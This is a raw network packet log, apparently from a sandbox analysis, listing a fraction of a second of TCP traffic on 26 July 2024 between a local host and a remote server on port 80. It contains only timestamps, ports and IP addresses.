Jul 26, 2024 20:09:13.626012087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626027107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626040936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.626041889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626058102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626072884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626085997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.626087904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626102924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626115084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.626116991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626132011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626144886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.626147032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626162052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626173973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.626177073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626192093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626203060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.626207113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626221895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626226902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.626236916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626251936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626260042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.626282930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.626322985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.626903057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626925945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626941919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626952887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.626956940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626967907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.626972914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626987934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.626996994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.627002954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627017975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627033949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627042055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.627049923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627063990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627068043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.627079010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627093077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627106905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627110004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.627121925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627151012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627161980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.627166986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627176046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.627182007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627196074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627219915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.627258062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.627861977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627885103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627899885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627912998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.627914906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627929926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627932072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.627947092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627954960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.627962112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627976894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.627991915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628000021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.628006935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628021002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628031969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.628036022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628050089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628052950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.628065109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628078938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.628079891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628096104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628110886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628117085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.628125906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.628127098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628143072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628159046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628168106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.628210068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.628968000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.628990889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629012108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629030943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629045963 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629053116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629061937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629076958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629081011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629091024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629098892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629106998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629122019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629125118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629137039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629152060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629156113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629165888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629180908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629195929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629195929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629210949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629220009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629225016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629240036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629254103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629255056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629270077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629275084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629285097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629300117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629302979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629343033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629705906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629722118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629735947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629751921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629755020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629765987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629781961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629790068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629797935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629812956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629832983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629851103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629858971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629867077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629882097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629893064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629898071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629914045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629923105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629929066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629942894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629957914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629966974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629973888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.629987001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.629991055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630004883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630022049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630031109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.630072117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.630773067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630796909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630810976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630820036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.630826950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630841017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630856037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630858898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.630872011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630887032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630897045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.630902052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630916119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630924940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.630930901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630947113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630955935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.630961895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630976915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.630979061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.630990028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631006002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631019115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631021023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631035089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631051064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631059885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631064892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631081104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631091118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631115913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631153107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631696939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631712914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631733894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631750107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631755114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631763935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631779909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631789923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631795883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631808043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631810904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631827116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631841898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631846905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631856918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631871939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631886959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631892920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631901979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631916046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631918907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631931067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631941080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631946087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631962061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631967068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.631978989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.631994009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632009029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632014990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.632067919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.632703066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632719040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632733107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632755041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.632756948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632771969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632786036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632790089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.632801056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632817030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632832050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632838964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.632847071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632862091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632869959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.632875919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632890940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632898092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.632905960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632920980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632924080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.632935047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632946014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.632950068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632966042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632973909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.632982016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632997036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.632999897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.633011103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.633027077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.633038044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.633081913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.633384943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.633431911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.633457899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.633475065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.633490086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.633505106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.633507967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.633517027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.633534908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.633574963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.667515039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.667531013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.667546034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.667618990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.667637110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.667650938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.667655945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.667665958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.667681932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.667747974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.667747974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668126106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668158054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668175936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668186903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668206930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668231964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668256998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668272972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668288946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668306112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668313980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668333054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668359041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668390989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668406010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668421984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668437004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668452024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668452024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668471098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668510914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668715000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668730974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668745995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668761969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668773890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668776989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668791056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668800116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668807030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668822050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668828964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668838024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668853045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.668860912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668885946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.668926001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669118881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669140100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669154882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669167042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669171095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669186115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669197083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669218063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669251919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669301987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669317961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669339895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669353962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669359922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669368982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669384956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669394970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669400930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669414997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669424057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669430971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669445038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669456959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669461966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669476986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669492006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669497013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669506073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669517994 CEST	49704	80	192.168.2.5	85.28.47.31
